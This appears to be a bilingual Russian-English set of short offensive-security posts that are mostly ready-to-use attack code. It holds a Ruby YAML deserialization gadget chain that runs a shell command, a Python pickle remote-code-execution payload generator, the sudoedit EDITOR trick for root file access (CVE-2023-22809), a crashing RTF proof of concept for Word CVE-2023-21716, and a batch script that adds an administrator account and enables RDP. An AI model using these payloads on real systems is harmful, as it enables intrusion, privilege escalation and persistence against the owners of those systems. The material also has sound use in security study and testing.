Ruby Deserialization via YAML file

# RU

Тут не будет каких-то подробностей, считайте дополнение к прошлому посту

Сама команда выполняется в git_set
Т. е сам YAML файл выглядит так

# EN

There won't be any details, just consider it an addition to the previous post

The command itself is executed in git_set
That is, the YAML file itself looks like this


---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve

# RU

А содержимое ruby скрипта будет таким

# EN

And the contents of the ruby script will be

require "yaml"
YAML.load(File.read("payload.yml"))

# RU

И потом делаем

# EN

And then do

ruby deser.rb

# RU

Да там будут ошибки, однако наша команда будет выполняться.

# EN

Yes, there will be mistakes, but our command will be executed.


THX:

https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565

https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/

https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

Небезопасная десериализация

Всем привет! С вами wr3dmast3r, и сегодня я познакомлю вас с интересной уязвимостью, связанной с небезопасной десериализацией данных

Читать

Python Deserialization via Pickle

# RU

У Python есть несколько методов сериализации объектов: Marshall и Pickle
Модуль Pickle реализует двоичные протоколы для сериализации и десериализации объектов Python. Однако модуль Pickle не является безопасным и лучше распаковывать только те данные, которым вы доверяете.

Для эксплуатации мы будем использовать следующий метод:
pickle.dumps(obj)

Помимо этого есть еще библиотека pickletools

Этот модуль содержит различные методы, относящиеся к внутренним деталям модуля pickle

Здесь нам потребуются два метода:
pickletools.optimize()
pickletools.dis()

Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем reduce в нашем классе


# EN


Python has several methods for serializing objects: Marshall and Pickle
The Pickle module implements binary protocols for serializing and deserializing Python objects. However, the Pickle module is not secure and will only decompress data that you trust.

We will use the following method to exploit it:
pickle.dumps(obj)

Apart from that there is also the pickletools library.

This module contains various methods related to the pickle module's internals

Here we need two methods:
pickletools.optimize()
pickletools.dis()

Now we can make our own payload to get the RCE. By the way, to serialize our payload as well, we use reduce in our class

PAYLOAD

import base64
import pickle
import pickletools
import subprocess
class anti_pickle_serum:
def reduce(self):
command = ['id']
return subprocess.check_output, (command,)
exploit_obj = anti_pickle_serum()
raw_pickle = pickle.dumps({"serum" : exploit_obj}, protocol=0)
optimized_pickle = pickletools.optimize(raw_pickle)
pickletools.dis(optimized_pickle)
payload = base64.b64encode(raw_pickle)
print(payload)


THX:

https://docs.python.org/3/library/pickle.html

https://davidhamann.de/2020/04/05/exploiting-python-pickle/

https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd

Sudoedit Privilege Escalation (CVE-2023-22809)

#RU

Проверьте, что вы можете использовать sudoedit

cat /etc/sudoers

Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root

export EDITOR='vim -- /path/to/your/files'

Теперь вы можете читать/писать файлы с привилегиями root

sudoedit /etc/custom/service.conf

#EN

Check that you can use sudoedit

cat /etc/sudoers

By introducing an extra dash, we can make our editor work as root

export EDITOR='vim -- /path/to/your/files'

Now you can read/write files with root

sudoedit /etc/custom/service.conf

Tools:

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc

CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a script to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0